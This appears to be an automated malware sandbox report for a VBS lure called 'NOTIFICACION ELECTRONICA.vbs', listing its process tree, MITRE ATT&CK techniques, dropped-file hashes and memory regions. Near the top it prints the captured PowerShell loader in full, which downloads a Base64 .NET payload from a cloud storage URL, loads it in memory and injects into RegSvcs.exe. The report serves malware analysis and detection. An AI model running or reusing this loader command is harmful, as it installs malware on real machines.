$ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$hknqe = '0';$ugscw = 'C:\Users\Admin\Downloads\NOTIFICACION ELECTRONICA.vbs';[Byte[]] $sqqbj = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($sqqbj).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.oveunoivne/sdaolnwod/sagracsed/cdsacd/gro.tekcubtib//:sptth' , $ugscw , '____dsf___________________-------------', $hknqe, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:588
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:3076
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:4220
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3452

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3977855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3844

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

Filesize
210KB

MD5
48d2860dd3168b6f06a4f27c6791bcaa

SHA1
f5f803efed91cd45a36c3d6acdffaaf0e863bf8c

SHA256
04d7bf7a6586ef00516bdb3f7b96c65e0b9c6b940f4b145121ed00f6116bbb77

SHA512
172da615b5b97a0c17f80ddd8d7406e278cd26afd1eb45a052cde0cb55b92febe49773b1e02cf9e9adca2f34abbaa6d7b83eaad4e08c828ef4bf26f23b95584e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012

Filesize
27KB

MD5
6b5c5bc3ac6e12eaa80c654e675f72df

SHA1
9e7124ce24650bc44dc734b5dc4356a245763845

SHA256
d1d3f1ebec67cc7dc38ae8a3d46a48f76f39755bf7d78eb1d5f20e0608c40b81

SHA512
66bd618ca40261040b17d36e6ad6611d8180984fd7120ccda0dfe26d18b786dbf018a93576ebafe00d3ce86d1476589c7af314d1d608b843e502cb481a561348

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
1KB

MD5
9a149521b0781274f19bed848bbe77ae

SHA1
ed87050f03254177d4982b4f9707187d2a4d6da5

SHA256
ab2e2e3bdac907c2b5366a593df38d35542063d4ee4e95ce922948f542c6b6f0

SHA512
616869184e6ba8f39520353813914654798d63cfe147f7e4d6792aef17fdbb9d9c41f0747cbab45010c15105ae85854baac69aab0e12c71477faf08a26364209

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
768B

MD5
1f5191a39065192ffc09b87f00d0c0e0

SHA1
a7c2713801ff5a7c716018237992e078261985fb

SHA256
309d8c63d18cb2d46be92603a71d0daed469ee11ecd96bcda07dc19944d33cad

SHA512
b54fde9d20ed0e277514d0495e9fb26b4808ed9674bbba459e986f16fc1792fcd0a480ed5478958fe6484e19da315ee1fbab1743fc3db9928e957fe1fd53d91d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
ad847419ae01ffa7f19073892b976b51

SHA1
3ce5299dbc56b5bc6f3f2d15282f8d1f5757502f

SHA256
00e91884269d923bed464851af6f5e52330d66cc1de40343278c2e9930c11478

SHA512
8a1e349e2e098d251510836920a2c4d61962e40f28e141af39ba282aa7ecbafce196c902952eb3b9b06149c7b1f67f4b4fb41a6f63eaf501e4e3e4a2e4f682e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
696B

MD5
57185fea8a68d3b2400915d73680a42b

SHA1
9f7950fcd086d15beb5ff4195d452d4fde6a9299

SHA256
7f3aa7002a46abdca0725262be47949e592a516ab706f428f022a8c2f5579203

SHA512
767b1d6ea57aaa3d7a2bae6f5666682194f75e309cdabddd1e7cdda98c3522654084d8337f1126ffd3d9b950789ec6551d8329879e9ec83382672040e51b1a6d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
21a231be3bb8a0c47e596a2b274afa52

SHA1
ac3a54d8e69869f3b8b6d51babc55bf8af46e304

SHA256
5ca92c60c0900df209a3f7ccc88f5c75e2f3f5fc89cc8e634b89b0f04e81a67e

SHA512
fbde99fd5f32ddb1a7ad8eba7707a690a1baad05da2d496b536839c708c42419b57f620cd41ddfd8da42a2fa2ffa6e36fc1de971c9f4107c2cd77b7b3244eacb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
5KB

MD5
f97cf0525745e5dadc4208226a0d09ab

SHA1
603391f1466c39c492408201bb220bc85f7def7d

SHA256
4fd375950e4a4602987c9122376a2ee776a9e4b59900c77c91ac3c4008f6e1b2

SHA512
20f804be321031a98611dcba3bebd3b4a53e682f160db62842186feb91adbf597220b91902cc914c7028bf2301cf97f8882c12457bde18ced4707b4859030b37

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
cc2f6cb22dd14915dc15caa62649b096

SHA1
31a3e38e7642ed47a38a04be5e53d44044f33761

SHA256
80d803f03935fb841d83872a73f6fefdbe25501df43f79aec3e20cec2b059587

SHA512
abfc24ebf1a4944a5bcc34ed3a26f4f758c7953a3ebab84a13a6aa8536f611be5023f3c0ed60c6030eae893e3d5e727366e6042ca20b0900e1c420dbe56fc4fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
7ba914d8ca53fcb250650d32d0c75055

SHA1
aadce2d7c44fb419d0d0b90065c4a6e83df72f33

SHA256
1287d16905d44c19b4dcbf6da7a52afe993c5e6de0fd9cc113eeef66b5131f8c

SHA512
4bed5d28114324f4888060d8f7b3a64fffeeea71f93634a8211770c168169f5e2ca43d8f98a9487197f9d318aa204d205707ce9e9fa807627037a70be1916297

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
858B

MD5
fc57d11e4d0ce53885945b5a8de4e2b0

SHA1
09ace9bb15bff1922da6cff6ca65ee4b9351c705

SHA256
615e55546eced43fa8fe2dd31725ff6fb3714d68ce145012bd0bae1b79f6864f

SHA512
c60afb3eb546ea813a0b4ad7ba899781bd748d8fee93741e9b7ded7bbb575416ea5b1bb44c681be927ebfe71aa856d310fa69b8f17305a520dafc6afc456e37f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5f87633215e7b68e3317597147c7b429

SHA1
3f028d69c10ef57b9fdf7efddbb380df53489dc0

SHA256
746e7b1f11358e6fd894380fe3ef78db305bcd75b0e3d76a12bc0d3b424c7d4b

SHA512
d6b7e1178583208faf1ba6a233b56b4e8a6f11cc054fdbdd599629df6bd5211ebda9f84a6bd6df91f3d9ddc45a18fb406d7d8b9fe48c34413125ac01daef19c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
d78c717bd7015490f308db27b14e850e

SHA1
b223c7342bf3da776690827dfbe109ee8b105217

SHA256
d820dc2439e06936db05ca75682a72ad71c30a91bcf3cd54fab81f9994db7d36

SHA512
7e40b2d25ad7ed54dc045cc89cc38e7b49edd0f58d3ea002130de2ce45e5656dec2a7ca8d7410b2c0bc86e057c68d6506f223334d51ddfffa71861912dee82f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3d077316984bb68cda404e89c7402aa8

SHA1
1f2f5b51cb62d6570889dcb2efa8121997333e4f

SHA256
8a86e15961d99bc4be7d132dea4a457cd08ab6a6af5f906a20da78399889ed01

SHA512
f8159308cfacf4faf6b5722bb51be0577ee77d06c59e1857bd39cca9f48203ae0cfd2515a3e42fbeedfdd35f60f13c1b0e3380950f8b2eb7267d048eb0f0024d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
1043241f158f7a629ba7a7e90ad8f558

SHA1
d42dc99e3cb5db101eb0f95ddb3f5cb106468b9b

SHA256
27d8c37e3eeda90f8ad02de024f97da0784bde7e1e3dca263d9383c8df55c231

SHA512
ab3f4a322a046e836fdfb98742346293a16a32efbb69e7387666567e69d2f4c30608183150cfb538c8cd033332ca4806db9e26578a5bcd037c1ffdb325b643cb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
d3a9f720c979bad55e937dc8d7bccf89

SHA1
06595c494bfbe79c50f42f74f6d506ced5d1262e

SHA256
b576e2836364a0f518d75437fe6ec4eedaf2a86e6747f308c717facbb41e147b

SHA512
744b47ba09f849defc6d14d3eb278569080a1532c2a22a5bea7763f5eebb4b41de0a96e06b292352007b0cdbb69c5c73ec7963592cfcffc4cb10ac2242f3a9ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
9e321a81e24976e930c30fe11c09a915

SHA1
7f81562e34bbb5ba61abfe4fc9f1869afb195d81

SHA256
5c142d28e1de90181f108c953e2d9b8dee4c56cb119b7b04bf6f9a8c69237697

SHA512
30bff5e1e732048402e71912f3858aca2e4c093d4d90552f5d8a142dc0e01d7d4803faa54c0530cd8b2c3fce1de87afa34d46130cabf6d71056bd14de54311eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
c438b7e271af35d7643c59f9d00fc417

SHA1
228712aec1be8bae5879216e3b348603e5fc4f33

SHA256
f0a4d325213b62dfc209aeef80b44fc13aa5e1848e608d5acecfde3bb4a49916

SHA512
bed9a2b3a5c7bca4cd9b25fd6acfb0ac8ef7db9350939bef39e91aec7910c8a073f0731606ed5e99420976fb8c33a2d346a5cc7a0fdd76a301a09f103b30ff4d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
fe6d7c4ae1bc66fbd7fe7f53c594ed5f

SHA1
f27e6e72560bc65d939fe4b301b576352d13c832

SHA256
067912b2ba2969c2a02ea131c2adbd90fc24eedd96c673f9381b35de0407426c

SHA512
b67e2207ce1c1b09682c588e906687c7cdcc968c90d2d8dd91366cb377af3e317f84eda1ee0f1782d387ba5b1f65a1fd108e18f7c0634a69264ff80c6c4599f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a7d4f8f8f41ed97b4333f6a3904bc5d2

SHA1
2348069790d2eeef1e90195f0ed2df17b6b0bb8f

SHA256
07f7f340a20abac9571ef32540592f4fe5569ac5c1fdb502db2907484e432635

SHA512
a80a84c0c68dec45225b977f2d074aef8f3de5e13f38ff8e7c158caf9725089620464e3162fc5d1c47fcd76bb85584f230adc9870083948f8a082a7cf9b92972

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
c2100c08a784291720b8d8ee316ef8f7

SHA1
5bec6b9a6189571163e712e62f61d2062dd21400

SHA256
712f5b8eda79de6801bee0958d44d7d742b6a06b7f7a4f7070ca440d90ae03bd

SHA512
35a784f9c71e2667c78e540f80907dcb4f88ecca405910b085cca12763ac61157eca9fb0c84c5892087b1082365be56bf0e0e292e9494024416c8f4e92dfc825

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
dbcb2704f1353badba658b4a3f73616a

SHA1
0301ee0f5d563c5bea2406e08398356306b5a1eb

SHA256
43ff5e18d05e81dd22115056cc9c1702095e569127db80361cd03df6b0301e9c

SHA512
b8c84afa4e04890487f952f13cbf339db8b45025023bfbf658d5806ed7f14046aaea95a5f9f044dd62206158dd7d9e8e3f793dc134f3ab7ebcb2b8d492f97b64

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
41a2a0c32b3ef6711d2ca4f219e7482c

SHA1
65e5f5ba18ea771c86a75c74a94d1303372139c9

SHA256
5f55734dfa006ad96480a028d0258272fb95933f9714d4561a6bf8d6b85bda05

SHA512
3e3f9ea2f464b6101be80f836322576a6c3a3c8dc2834fe80bd3d548d940c02790a9c449c245e19c1284b9d3bdea515a8428a3a8d67d97ca3b4e8af0ab224cbd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
d5f687f188023b2f3547e53663d5fc6a

SHA1
7dc2bb8cbc4cbe9da2246da97c03feddeae2cf72

SHA256
3866e6ff093786b7f50334dd307a9c5343f56ec92074a9f11ded923ace9f5a97

SHA512
5a3dd75c410800fa49abf577546a47c738a9fe838f2b3d0a5783e75d730b9e96937cd73e0e69a5639b3b608b96bcb7abe20127a16f8bd2d0c63869e8b8847c04

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
538d7681d56c7e91c24d0054b67ea955

SHA1
8a0ec4d2da5248e17b1ca5aa349cd92797b5459d

SHA256
8363ffb601d5400dcb355ea1fc11660b4750c779a047c838e86f30c662e26619

SHA512
259ff92edb78bc6157240bfaedd441290d6ab736d14bb20750693c1a9ca30ad099832be5dfe622e48bf21bf00fc6ee4ec289ca59dbb27ca5cfee3c0b8f307f99

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
94c1e0c4726e146a96daad64e45c567e

SHA1
94ac4c5f6a53fa489f1b2acb3bb62ae99d659997

SHA256
c124271e9cd66221ec89411196ef81f9320d8ee1799bd46636716dccae287170

SHA512
1d3263ae4f7676fe7d8cbcbe29cfc1dcea8cf07d3e22ea802a145fa6d3017c018855c0b3185653aafdef3246de45b57d94280afba106ace8ce60d474aa4a6c08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
52a0d3bbfccc80c2ae8522895b68c753

SHA1
6d94198e9e10ecae741935a6380d1d86beb3b949

SHA256
3d9a40e46ec73216c590c3cfad99962411b88d5301429de0158ddfa02e806d2f

SHA512
318565ad794f4abde5475f0474509b5d9474784daa674893ef595a74ed8ce50d0b50de87c6421e5f779a9305e180ea0d337709c0dbd2382e52a9f99018659617

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
dbbd63836691624a96d0f9a2a9e9bedd

SHA1
2fa340c464da1f224a6feadded7b24ba5627b20e

SHA256
97bdeb6fe68202b93e7d177ed9a901ea703887690bb4ceda67cdebfdb679d81b

SHA512
45a8dc638374f368ba60c277721a8e18e6b14d83c406b8f5ae437e7f547a45a152333a803cf85254653a5f406122860f9f13b63b5ee1b16f8223422d687c0bd9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
6d60bce4926bfb45d8001002e049b8cb

SHA1
b121740238ec3efa464cbbaada2eac8127f394e2

SHA256
1010747fb026bfe01b64b7c98988317749ce277eb04e9a759538547ac079b38c

SHA512
9423c21ff9cbca2ba156e76a1b2ec7beab66fe1821d68f36b1a50a683231875f4988b2774f8973954a32bd4fb18a22467993e2c518637d60ee14657cb11a8c74

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
b1510f36c5aad0ef0db09f8ef7103dd1

SHA1
bb18879d6e688466abcb9a810ac7980c45b82f93

SHA256
240ac4fde9af92092de894e48feaa26acd9747a45453e9b47a8a5ee550a2673a

SHA512
fbdfa728b9c5c5bacd2baea993a9df865880f9c7faf136a7760a23e5c89525bbbc04af5bc6894e54dd43b4071f189109b2e4ae0fb1bc0bf23f5943c8bbebd1ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
a77b5c225517f4161eb83c7c28f6cf2e

SHA1
f00fde6dfd3247b684c4e853c29242fdf0269baa

SHA256
b9c0c32cae80c05e8e87862b851f91ab9546eafb70cec1a347638647d3f8a04a

SHA512
0425d213af2f749959d119726298d27cf0b67bb6db93a11f6acb1a513e20d5861e6b7da562a0c474d6739f70d0ee55b0e77f730ef278ddb71dfac30d195b3abd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
80f07204cbc59f6725e31e58bdabbcc1

SHA1
2721e23b3dd45944967bf323c7d3c7a0032d9800

SHA256
4bbdb7f5c00db58594a28178b45f49f40c56c800531cc1aa934eb43bb26e5520

SHA512
c79e05ee1ac7f335f8f9d97f98a6ea6218361922bad28fea4811e22099debe4b850a1d46722e9a7897f61894137d09ae339e7abf76e1e74b8eebd40dc6a255d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
63dac0c43696424186fa810540a3d579

SHA1
28a79bdf1a1b54b7cce8c55ce37133c1deb434b6

SHA256
cb04befe1e7d673c0730b99ba556f690bc1237c826e7fa72ab8ab720c30dc3ab

SHA512
abbd9e5ef61bbb0b8a54f78e43e9e3ac6963f1a9c9541881f14c9656fb54b8087ece22ee127a1d74d3115b1696771b8769bcda7e717d62b28b306fb1437bbdcd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
452e580195fd65045832b0f0571f1c64

SHA1
c7979551bb144c7708e42531535b94a5febeb97a

SHA256
5ad4716e10c0b0f96330eca68062a290fb938579d4b654e789fd8fc28bf55ed3

SHA512
ab862385a28c5c1143d5b80419419057ff8757aa1136bd43b1018fb2d46b58939e4d9e17a53867fdcc8102621b670ec65caf780d4bd9dc6d84606b6a1f322aa8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
5f47d63e4e56bcd7e0e251e3533f63b0

SHA1
77d48bd975488074709c679b6e693f0931aabe99

SHA256
bc06bcde593703115643ca7ee691038c4fd7a795bd7090f7f327b236083563c8

SHA512
abf76e8499f7fdc18bd908b8698abbd62b20b2f71de168086b2dbe72fa53695b052ce080407dd33317d557739e4efb421ddc22599fffe4b3fe27a9f1654b86c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
1a11402783a8686e08f8fa987dd07bca

SHA1
580df3865059f4e2d8be10644590317336d146ce

SHA256
9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

SHA512
5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ehbd2ack.1th.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 165508.crdownload

Filesize
11KB

MD5
90e15cc774878cfb5306d2f33d89a4bb

SHA1
95013a6bce7182cd6fb9f2814f1ba03c16530aaa

SHA256
9230957a3d2cf5d237ede11a19d2785a432349aa91d83056ecd86571a6d4ac20

SHA512
b37a5dc3ff2b1c24c6d46e5ad0b0f9cc18d57367548365fd7bf846b8219fd6b887dba27002304a69344e2fc1fd5fbfed02b7bc5167751e68145a7d8aa70147bd

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 650457.crdownload

Filesize
13.8MB

MD5
6d26c84c69c39bcd209e766b872db355

SHA1
b309860ebc9bca82aa649c7f8e7e7525bf5482f9

SHA256
433254d4609e8925057fdd8705725cf7997e32e459d1b29e2e701240f59f2881

SHA512
c308dc90112ed024348e9ce14f62f9e7d66bca5e2edecbbed918687c81bde29229cd16f2849efcbd5eafbcc669e262a62d43c918b39103b68eeee89aabe0d334

Download Submit
memory/1540-482-0x0000000005B10000-0x00000000060B4000-memory.dmp

Filesize
5.6MB

Download
memory/1540-483-0x00000000055D0000-0x0000000005636000-memory.dmp

Filesize
408KB

Download
memory/1540-466-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/1540-517-0x00000000066C0000-0x0000000006736000-memory.dmp

Filesize
472KB

Download
memory/1540-518-0x0000000005740000-0x0000000005750000-memory.dmp

Filesize
64KB

Download
memory/1540-519-0x0000000006660000-0x000000000667E000-memory.dmp

Filesize
120KB

Download
memory/1540-520-0x00000000069F0000-0x0000000006A82000-memory.dmp

Filesize
584KB

Download
memory/1540-481-0x00000000054C0000-0x000000000555C000-memory.dmp

Filesize
624KB

Download
memory/1540-563-0x0000000006560000-0x00000000065C4000-memory.dmp

Filesize
400KB

Download
memory/2124-464-0x0000028DC50D0000-0x0000028DC50D8000-memory.dmp

Filesize
32KB

Download
memory/2124-465-0x0000028DC50E0000-0x0000028DC50EA000-memory.dmp

Filesize
40KB

Download
memory/2480-445-0x000001E8EB2E0000-0x000001E8EB302000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads